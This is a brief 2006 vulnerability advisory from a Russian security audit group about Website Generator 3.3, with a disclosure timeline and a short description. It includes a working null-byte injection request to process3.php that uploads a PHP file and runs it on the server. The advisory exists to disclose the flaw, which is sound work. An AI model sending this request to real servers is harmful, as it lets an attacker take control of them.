Advisory: NSAG-№202-25.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: WEBSITE GENERATOR 3.3 Site of manufacturer: http://freehostshop.com The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is not notified (there is no communication). 17/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/894.html Risk: Hide Description: The removed user, can upload php script from other server and execute custom php code on webserver. Exploit: Method GET: http://example.com/files/myforms/process3.php?formname=attack.php%00*name[0]= Link: http://example.com/files/myforms/forms/attack.php More information: http://www.nsag.ru/vuln/894.html ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ www.nsag.ru «Nemesis» © 2006 ------------------------------------ Nemesis Security Audit Group © 2006.
